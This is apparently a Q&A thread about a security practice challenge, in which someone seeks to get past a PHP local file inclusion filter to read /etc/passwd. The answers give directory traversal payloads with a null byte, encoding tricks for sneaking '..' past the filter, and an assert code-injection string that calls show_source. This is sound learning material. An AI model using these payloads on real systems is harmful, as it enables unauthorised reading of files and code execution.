# Cannot figure out how to bypass this function for lfi

Tags: php, webserver, url

I'm currently doing some practice about security and facing challenges provided in a website.
One of them talks about LFI and I did figure out what to do, but I have no idea how to do this, so let's show you the problem:

Here is the url to hack:

```
http://example.com/challenge27/?page=contact
```

I'm asked to get the password in `/etc/passwd`, so the first idea that comes is to try some directory transversal:

```
http://example.com/challenge27/?page=.
```

This throws an exception:

```
Warning: assert(): Assertion "strpos('includes/..php', '..') === false" failed
```

What is obvious is that the `strpos` detects every occurrence of `'..'` in the path and the assertion checks that this function returns a false value

Then I try it by adding a null byte at the end of the same url

```
http://example.com/challenge27/?page=.%00
```

which gives me another hint:

```
Warning: file_exists() expects parameter 1 to be a valid path
```

But here I'm blocked, my goal is to inject the path to `/etc/passwd` like this:

```
http://example.com/challenge27/?page=../../../../etc/passwd
```

I feel like I can exploit the null byte solution but after trying many different urls either I got the file_exists() warning or the assert() one, I'm running out of ideas now, does somebody have one more hint to give?

Comment: I don't see this website (no DNS record), but what does http://my_practice_website.com/challenge27/?page=/etc/passwd show?

Comment: @GeorgeY. You can't register a .com domain with underscores. OP uses it as a placeholder. That said it would be easier if we'd get the original site.

Comment: Yes this url is fake, just for the example, if you want the real challenge website I can give it by PM.

Comment: @onizukaek Please include it in your question if possible.

Comment: @Arminius sorry not possible, if I provide it here and you answer directly it would be against the website rules who intend to not give nor broadcast the solution until you solved it by yourself, therefore I cannot quote the right domain here

Comment: Do you know what version of PHP it's running? Null byte injection was fixed a while ago iirc.

Comment: so what does <website>/challenge27/?page=/etc/passwd show? And what does <website>/challenge27/?page=%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd show?

Comment: @GeorgeY page=/etc/passwd shows "File does not exist" and the second one does not pass the filter

Answer (score 3):

Usually it will be the path, followed by null byte in order to terminate the string when the [C code runs that actually retrieves the file](https://secure.php.net/manual/en/security.filesystem.nullbytes.php):

```
http://example.com/challenge27/?page=../../../../etc/passwd%00
```

Note that null byte characters don't work in up-to-date versions of PHP.

The other challenge is to get `..` past the filter.

[Try these](https://security.stackexchange.com/a/96991/8340) to see if they can bypass this checking:

- Try using 16-bit Unicode encoding (`.` = `%u002e`).
- Try double URL encoding (`.` = %252e).
- Try overlong UTF-8 Unicode encoding (`.` can be `%c0%2e`, `%e0%40%ae`,
  `%c0ae`)

Comment: Thank you for this information SilverlightFox, that's exactly what I wanted, I tried it, unfortunately the exploit was not what I thought, I get "Warning: file_exists() expects parameter 1 to be a valid path," I think I was completely wrong

Comment: I forgot to tell you the url I tried:
/?page=%u002e%u002e/%u002e%u002e/%u002e%u002e/%u002e%u002e/etc/passwd%00

Answer (score 2):

Try passing a `'` as input. If it throws an exception like `Parse error: syntax error, unexpected ’’, ’’ (T_CONSTANT_ENCAPSED_STRING) in ...` then it is vulnerable to code injection.

In that case you can open any file like:

```
' and die(show_source('/etc/passwd')) or '
```

more info at [this write-up](https://github.com/birdsoup/CTF-Writeups/tree/master/2016/CSAW/mfw).